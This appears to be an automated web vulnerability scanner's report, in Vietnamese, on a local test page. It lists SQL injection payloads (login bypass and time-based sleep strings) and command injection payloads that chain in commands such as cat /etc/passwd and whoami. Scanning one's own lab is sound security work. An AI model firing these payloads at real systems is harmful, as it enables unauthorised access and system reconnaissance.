[TIME] 2025-07-24 15:45:22
[URL] http://localhost/sqli/
[SUMMARY] SQLi, CMDi
======= SQLi =======

[*] Đang kiểm tra SQL Injection trên: http://localhost/sqli/
[!] URL không chứa tham số. Đang thử tìm form để kiểm tra...
[!] Có thể bị tấn công SQLi với các payloads:
    - txt_uname=' OR '1'='1
    - but_submit=' OR '1'='1
    - txt_uname=" OR "1"="1
    - txt_pwd=" OR "1"="1
    - but_submit=" OR "1"="1
    - but_submit=') OR ('1'='1
    - txt_uname=" OR 1=1 --
    - txt_pwd=" OR 1=1 --
    - but_submit=" OR 1=1 --
    - but_submit=' OR 1=1#
    - txt_uname=" OR 1=1#
    - txt_pwd=" OR 1=1#
    - but_submit=" OR 1=1#
    - but_submit=admin' --
    - txt_uname=1' or '1' = '1
    - but_submit=1' or '1' = '1
    - but_submit=' AND 1=1 --
    - but_submit=' AND 1=2 --
    - txt_uname=" AND 1=1 --
    - txt_pwd=" AND 1=1 --
    - but_submit=" AND 1=1 --
    - txt_uname=" AND 1=2 --
    - txt_pwd=" AND 1=2 --
    - but_submit=" AND 1=2 --
    - but_submit=') AND '1'='1
    - but_submit=') AND '1'='2
    - txt_uname=" OR "" = "
    - txt_pwd=" OR "" = "
    - but_submit=" OR "" = "
    - txt_uname=' OR '' = '
    - but_submit=' OR '' = '
    - but_submit='; WAITFOR DELAY '0:0:5' --
    - but_submit='; SELECT pg_sleep(5)--
    - txt_uname=" OR SLEEP(5) --
    - txt_pwd=" OR SLEEP(5) --
    - but_submit=" OR SLEEP(5) --
    - but_submit=') OR SLEEP(5) --
    - txt_uname=" OR 1=1; SLEEP(5) --
    - txt_pwd=" OR 1=1; SLEEP(5) --
    - but_submit=" OR 1=1; SLEEP(5) --
    - but_submit=admin' OR SLEEP(3)--
    - txt_uname=1); SELECT sleep(5);--
    - txt_pwd=1); SELECT sleep(5);--
    - but_submit=1); SELECT sleep(5);--


======= XSS =======

[*] Đang kiểm tra XSS trên: http://localhost/sqli/
[!] URL không chứa tham số. Đang thử tìm form để kiểm tra...
[✓] Không phát hiện lỗ hổng XSS.


======= LFI =======
[*] Đang kiểm tra LFI trên: http://localhost/sqli/
[✓] Không phát hiện lỗ hổng LFI.


======= CMDi =======
[*] Đang kiểm tra Command Injection trên: http://localhost/sqli/
[!] Có thể bị tấn công CMDi với các payloads:
    - && cat /etc/passwd
    - && ls
    - && uname -a
    - && whoami
    - &&id
    - ; cat /etc/passwd
    - ; ls
    - ; uname -a
    - ; whoami
    - ;id
    - | cat /etc/passwd
    - | ls
    - | uname -a
    - | whoami
    - |id


======= XXE =======
[*] Đang kiểm tra XXE trên: http://localhost/sqli/
[✓] Không phát hiện lỗ hổng XXE.


